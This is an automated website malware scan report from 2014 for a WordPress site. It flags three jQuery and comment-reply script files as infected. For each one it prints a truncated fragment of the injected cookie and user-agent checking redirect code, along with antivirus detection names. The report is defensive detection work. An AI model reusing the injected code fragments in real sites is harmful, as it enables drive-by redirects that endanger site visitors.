New scan:

Malware Scanner report for joshemorris.com

Malicious/Suspicious/Total urls checked
3/0/12
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://joshemorris.com/
200 OK
Content-Length: 7479
Content-Type: text/html
clean
http://joshemorris.com/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 97365
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3200 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
jQuery.noConflict();

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://joshemorris.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8163
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3294 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://joshemorris.com/wp-includes/js/comment-reply.min.js?ver=3.9.2
200 OK
Content-Length: 1720
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 722 bytes are skipped ...
yle.display="none",h.parentNode.insertBefore(e,h)),g.parentNode.insertBefore(h,g.nextSibling),k&&d&&(k.value=d),j.value=b,i.style.display="",i.onclick=function(){var a=addComment,b=a.I("wp-temp-form-div"),c=a.I(a.respondId);if(b&&c)return a.I("comment_parent").value="0",b.parentNode.insertBefore(c,b),b.parentNode.removeChild(b),this.style.display="none",this.onclick=null,!1};try{f.I("comment").focus()}catch(l){}return!1}},I:function(a){return document.getElementById(a)}};

Antivirus reports:

Microsoft
Trojan:JS/Iframe.DI
Fortinet
JS/Iframe.JY!tr
Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.KG

http://joshemorris.com/wp-content/themes/gridiculous/library/js/harvey.js?ver=3.9.2
200 OK
Content-Length: 6668
Content-Type: text/javascript
clean
http://joshemorris.com/wp-content/themes/gridiculous/library/js/theme.js?ver=3.9.2
200 OK
Content-Length: 2824
Content-Type: text/javascript
clean
http://joshemorris.com/past-projects/
200 OK
Content-Length: 7768
Content-Type: text/html
clean
http://joshemorris.com/testimonials/
200 OK
Content-Length: 8590
Content-Type: text/html
clean
http://joshemorris.com/contact/
200 OK
Content-Length: 6345
Content-Type: text/html
clean
http://joshemorris.com/test404page.js
404 Not Found
Content-Length: 5680
Content-Type: text/html
clean
http://joshemorris.com/testimonials/christinejamra.com
404 Not Found
Content-Length: 5680
Content-Type: text/html
clean
http://joshemorris.com/wp-content/uploads/2012/09/Me-and-the-API.jpg
200 OK
Content-Length: 300952
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: joshemorris.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 02:13:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://joshemorris.com/>; rel=shortlink
X-Pingback: http://joshemorris.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: joshemorris.com
Referer: http://www.google.com/search?q=joshemorris.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=joshemorris.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://joshemorris.com/

Result: joshemorris.com is not infected or malware details are not published yet.